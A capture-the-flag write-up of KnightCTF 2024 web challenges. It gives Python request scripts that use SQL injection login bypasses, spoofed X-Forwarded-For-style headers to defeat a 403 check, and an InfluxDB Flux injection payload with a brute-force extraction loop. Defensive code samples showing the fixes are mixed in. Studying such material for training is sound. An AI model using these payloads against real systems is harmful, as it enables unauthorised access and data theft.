
KnightCTF 2024 WEB writeup

Time: 2024-01-23 17:00:43

Tags: WEB URL req 2024 base challenge-writeups post data requests

WEB

Levi Ackerman

Challenge description

Levi Ackerman is a robot! 

N:B: There is no need to do bruteforce. 

Author: saif

Target : http://66.228.53.87:5000/

My solution:

Warm-up challenge; the description hints at "robot"!

Request robots.txt directly to get the path:

Disallow : /l3v1_4ck3rm4n.html

Request that path to get the flag:

KCTF{1m_d01n6_17_b3c4u53_1_h4v3_70}

Kitty

Challenge description

Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite. 

N:B: There is no need to do bruteforce. 

Author: Munazir (YCF)

Target : http://45.33.123.243:5020/

My solution:

Weak password? Tried admin, no luck; looking at the page's JavaScript source reveals:

Viewing the Dashboard page source shows the if statement; entering the value it checks for, "cat flag.txt", is all it takes

and you get the flag.

Alternatively, bypass the login with SQL injection:

import requests

session = requests.Session()

base_URL = 'http://45.33.123.243:5020/'

login_data = {
    'username': 'yes',
    'password': '" or 1=1; -- "'
}

req = session.post(f'{base_URL}login', json=login_data)

req = session.get(f'{base_URL}dashboard')

print(req.text)

This bypasses the login and returns:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Modern Dashboard</title>
    <link rel="stylesheet" href="/static/dashboard.css">
</head>
<body>

<div class="container">
    <header>
        <h1>Welcome to the Dashboard</h1>
    </header>

    <section class="content">
        <h2>Latest Posts</h2>
        <div class="post">
            <h3>Post Title 1</h3>
            <p>This is some content for the first post.</p>
        </div>
        <div class="post">
            <h3>Post Title 2</h3>
            <p>This is some content for the second post.</p>
        </div>
        <div class="post">
            <h3>Post Title 3</h3>
            <p>This is some content for the third post.</p>
        </div>
        <!-- You can add more posts dynamically here -->
    </section>

    <section class="posts">
        <form id="postsForm" onsubmit="addPost(event)">
            <label for="post_input">Enter Post:</label><br>
            <input type="text" id="post_input" name="post_input">
            <button type="submit">Execute</button>
        </form>
    </section>
</div>

<script>
    function addPost(event) {
        event.preventDefault();
        const post_in = document.getElementById('post_input').value;

        if (post_in.startsWith('cat flag.txt')) {
            fetch('/execute', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded'
                },
                body: `post_input=${encodeURIComponent(post_in)}`
            })
            .then(response => response.text())
            .then(result => {
                const contentSection = document.querySelector('.content');
                const newPost = document.createElement('div');
                newPost.classList.add('post');
                newPost.innerHTML = `<h3>Flag Post</h3><p>${result}</p>`;
                contentSection.appendChild(newPost);
            });
        } else {
            const contentSection = document.querySelector('.content');
            const newPost = document.createElement('div');
            newPost.classList.add('post');
            newPost.innerHTML = `<h3>User Post</h3><p>${post_in}</p>`;
            contentSection.appendChild(newPost);
        }
    }
</script>

</body>
</html>

Then adjust the script to fetch the flag:

import requests

session = requests.Session()

base_URL = 'http://45.33.123.243:5020/'

# forms data with sql injection
login_data = {
    'username': 'yes',
    'password': '" or 1=1; -- "'
}

# Login to get access to dashboard
req = session.post(f'{base_URL}login', json=login_data)

# Set params
payload = {'post_input': 'cat flag.txt'}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}

# Retrieve flag
req = session.post(f'{base_URL}execute', data=payload, headers=headers)

print(req.text)
#KCTF{Fram3S_n3vE9_L1e_4_toGEtH3R}

Gain Access 1

Challenge description

The web challenges are very much similar to real life application bugs. This is going to be a series of Gain Access with 3 challenges unlocks upon solving one by one. By solving these challenges, you'll gain a practical knowledge of Authentication Bypass Vulnerabilities as well as business logic error. The only difference is you'll not get any bounty but you'll get flags. Give it a try. And keep in mind, don't make it hard, keep it simple. All the best. Solve the challenges & be a cyber knight. 

No need to bruteforce. There's a rate limit. If you send continuous requests, you'll be blocked for 3 minutes.

Author: 0xt4req

Target : http://45.33.123.243:13556/

My solution:

Visiting the site gives:

Found an account in the browser console: [email protected] 

Scanning for hidden paths turned up a robots.txt

which gives the path: /r3s3t_pa5s.php

Opening it shows the message: No token provided.

So we need to obtain a token... capture the requests!

Submit the email in the forgot-password form and capture the request to get the token

Then go back to /r3s3t_pa5s.php, enter the token, and set a new password

When done it reports: Password Updated Succesfully.

Log in again and the flag is there...
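The reset flow above worked because the application handed the reset token back to whoever submitted the forgot-password form, so holding the token proved nothing about owning the account. As an added example (not part of this writeup and not the challenge's code), here is a server-side reset-token store in Python that keeps only a hash of the token, binds it to one account, expires it, and accepts it exactly once; the raw token is returned solely so the caller can pass it to a mailer. The class name `ResetTokenStore`, the 15-minute `TOKEN_TTL_SECONDS`, and the address `user@example.invalid` are my own assumptions.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

# Assumed policy value for this example (not from the challenge).
TOKEN_TTL_SECONDS = 15 * 60


def _digest(token: str) -> str:
    """Hash the token so a leaked store does not leak usable tokens."""
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


class ResetTokenStore:
    """Server-side state for password-reset tokens: one pending token per account."""

    def __init__(self) -> None:
        # email -> (sha256 hex of the token, unix expiry time)
        self._pending: Dict[str, Tuple[str, float]] = {}

    def issue(self, email: str, now: Optional[float] = None) -> str:
        """Create a fresh token for `email`.

        The return value goes to the mailer only, never into the HTTP response
        that answered the forgot-password form."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._pending[email] = (_digest(token), now + TOKEN_TTL_SECONDS)
        return token

    def consume(self, email: str, token: str, now: Optional[float] = None) -> bool:
        """Return True once for a valid (email, token) pair, then invalidate it."""
        now = time.time() if now is None else now
        entry = self._pending.get(email)
        if entry is None:
            return False
        digest, expires_at = entry
        if now > expires_at:
            del self._pending[email]  # expired tokens are dropped, not kept around
            return False
        if not hmac.compare_digest(digest, _digest(token)):
            return False  # wrong token: keep the entry, the real holder may still use it
        del self._pending[email]  # single use
        return True


if __name__ == "__main__":
    store = ResetTokenStore()
    t = store.issue("user@example.invalid")  # constructed address
    print("first use:", store.consume("user@example.invalid", t))   # True
    print("second use:", store.consume("user@example.invalid", t))  # False
```

The token is compared by hash with `hmac.compare_digest`, the entry is keyed by the account so a token issued for one address cannot reset another, and a wrong guess does not clear the pending entry (that would let an attacker deny the legitimate reset).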

Alternatively, we can bypass the password parameter

Exploit script:

import requests

session = requests.Session()

base_URL = 'http://45.33.123.243:13556/'

req = session.get(f'{base_URL}')

login_data = {
    'admin_email': '[email protected]',
    'admin_password': "' or 1=1; -- ",
    'submit_btn': "Submit"
}

req = session.post(f'{base_URL}index.php', data=login_data)

print(req.text)

#KCTF{ACc0uNT_tAk3Over}

README

Challenge description

Read me if you can!!

N:B: There is no need to do bruteforce. 

Author: saif

Target : http://66.228.53.87:8989/

My solution:

An input field reads files... so write a script to fetch them:

import requests

base_URL = 'http://66.228.53.87:8989/'

file = "text.txt"

req = requests.get(f'{base_URL}fetch?file={file}')

print(req.text)
#{"result":"Yes! You can read files! Dont ask for hint its ezz!!"}

Reading flag.txt returns an error:

{"result":"403 Access Denied"}

We need to get past this error (the check allows local reads):

import requests

base_URL = 'http://66.228.53.87:8989/'

file_path = "flag.txt"

# headers to bypass 403 Access Denied error
headers = {
    'X-Originating-IP': '127.0.0.1',
    'X-Forwarded-For': '127.0.0.1',
    'X-Forwarded': '127.0.0.1',
    'Forwarded-For': '127.0.0.1',
    'X-Remote-IP': '127.0.0.1',
    'X-Remote-Addr': '127.0.0.1',
    'X-ProxyUser-Ip': '127.0.0.1',
    'X-Original-URL': '127.0.0.1',
    'Client-IP': '127.0.0.1',
    'True-Client-IP': '127.0.0.1',
    'Cluster-Client-IP': '127.0.0.1',
    'Host': 'localhost'
}

req = requests.get(f'{base_URL}fetch?file={file_path}', headers=headers)

print(req.text)
#{"result":"KCTF{kud05w3lld0n3!}"}
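The 403 went away because the service decided "is this request local?" from headers the client itself can set. The example below is added here (not the challenge's code) and shows how a server should derive the client address instead: `X-Forwarded-For` is honoured only when the TCP peer is one of our own reverse proxies, and only the hop that proxy appended is believed; the other `X-*-IP` style headers carry no trust at all. The proxy range 10.0.0.0/8 and the sample addresses are assumptions.

```python
import ipaddress
from typing import Dict, Iterable, Union

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Assumed: our own reverse proxies live in this range; nothing else is trusted.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted(addr: IPAddr, trusted: Iterable) -> bool:
    return any(addr in net for net in trusted)


def client_ip(remote_addr: str, headers: Dict[str, str], trusted=TRUSTED_PROXIES) -> IPAddr:
    """Resolve the real client address.

    remote_addr is the TCP peer the socket reports; headers is the request header
    map. Only X-Forwarded-For is considered, and only when the peer is a trusted
    proxy, because a direct client can write any forwarding header it likes."""
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted(peer, trusted):
        return peer  # direct connection: forwarding headers were set by the client
    lowered = {k.lower(): v for k, v in headers.items()}
    chain = [h.strip() for h in lowered.get("x-forwarded-for", "").split(",") if h.strip()]
    # Proxies append; walk from the right and stop at the first hop we do not own.
    # Anything further left was supplied by the client and may be forged.
    for hop in reversed(chain):
        try:
            hop_addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: fall back to the peer address
        if not _is_trusted(hop_addr, trusted):
            return hop_addr
    return peer


def is_local_request(remote_addr: str, headers: Dict[str, str]) -> bool:
    """The check a /fetch endpoint should use before serving privileged files."""
    return client_ip(remote_addr, headers).is_loopback
```

The proxy must overwrite or append to `X-Forwarded-For` rather than pass it through untouched; with that in place, a spoofed `127.0.0.1` prepended by the client ends up left of the proxy-appended hop and is ignored by the walk.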

Fluxx

Challenge description

Recently I have made a simple app for monitoring and analyzing metrics, events, and real-time data. I used a database which is designed for handling high volumes of timestamped data. But I think it's vulnerable; find it and get the flag.

To be noted: The challenge resets after sometime. So please wait for a while if you see any error. 

Author: saif

Target : http://66.228.53.87:9001/

My solution:

Visiting the site shows:

Please visit /query?data= to travel with time.

Try sending some simple data:

import requests

base_URL = 'http://66.228.53.87:9001/'

data = '1" OR 1=1--'

req = requests.get(f'{base_URL}query?data={data}')

print(req.text)

The response:

HttpError: compilation failed: error @1:82-1:158: expected RPAREN, got EOF

error @1:152-1:153: invalid expression @1:151-1:152: =

error @1:155-1:158: got unexpected token in string expression @1:158-1:158: EOF

Searching based on the challenge description turned up a forum post describing this error: https://community.influxdata.com/t/query-throws-rparen-got-eof-error/18940

Something new: InfluxDB NoSQL injection; see: https://rafa.hashnode.dev/influxdb-nosql-injection

") |> yield(name: "1337") 
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name)) 
//

Brute-force exploit script:

import requests, urllib.parse

base_URL = 'http://66.228.53.87:9001/'

letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

for char in letters:
    # Close the string literal, yield a dummy result, then list buckets whose
    # name starts with `char`; die() surfaces the matching name in the error.
    payload = f'") |> yield(name: "1337")\nbuckets() |> filter(fn: (r) => r.name =~ /^{char}.*/ and die(msg:r.name))\n//'

    encoded_payload = urllib.parse.quote(payload, safe='')
    req = requests.get(f'{base_URL}query?data={encoded_payload}')

    # An empty result list means no bucket matched this prefix
    if req.text != '[]':
        print(req.text)

#KCTF{g0UPqVWa0eUT2wF2ipzX3v5pxikvqYhxR9OL}
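The RPAREN/EOF errors show the `data` parameter landing inside a Flux string literal, which is what lets `") |> yield(...)` close the literal and append new pipeline stages. As an added example (not the challenge's code and not InfluxDB's), the Python below puts the concatenating query builder beside a safe one that validates the value against a strict allowlist and hands it to Flux through the `params` object of the InfluxDB 2 `/api/v2/query` JSON body, so it never becomes query source. The bucket name `metrics`, the query shape, and the measurement-name allowlist are assumptions; whether the deployed InfluxDB version accepts `params` is also an assumption.

```python
import json
import re

# Assumed policy: a measurement name is letters, digits and underscore, at most 64 chars.
MEASUREMENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")

# Constructed Flux query. The user value is referenced as params.measurement, never spliced in.
SAFE_QUERY = (
    'from(bucket: "metrics")'
    " |> range(start: -1h)"
    " |> filter(fn: (r) => r._measurement == params.measurement)"
)


def build_query_vulnerable(data: str) -> str:
    """The shape that makes the challenge exploitable: input concatenated into Flux source."""
    return (
        'from(bucket: "metrics") |> range(start: -1h)'
        f' |> filter(fn: (r) => r._measurement == "{data}")'
    )


def validate_measurement(value: str) -> bool:
    """Reject anything that is not a plain identifier (quotes, pipes, newlines, slashes)."""
    return MEASUREMENT_RE.fullmatch(value) is not None


def build_query_body(measurement: str) -> dict:
    """JSON body for POST /api/v2/query with the value carried as a parameter."""
    if not validate_measurement(measurement):
        raise ValueError("measurement name rejected by allowlist")
    return {
        "query": SAFE_QUERY,
        "type": "flux",
        "params": {"measurement": measurement},
    }


def request_body_json(measurement: str) -> str:
    """Serialized body; json.dumps escapes the value, the query text stays constant."""
    return json.dumps(build_query_body(measurement))
```

Two layers are deliberate: the allowlist stops hostile input at the edge with a clear error, and the parameter binding means that even a value the allowlist let through is data to the Flux interpreter rather than code.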

 

From: https://www.cnblogs.com/mumuhhh/p/17982873
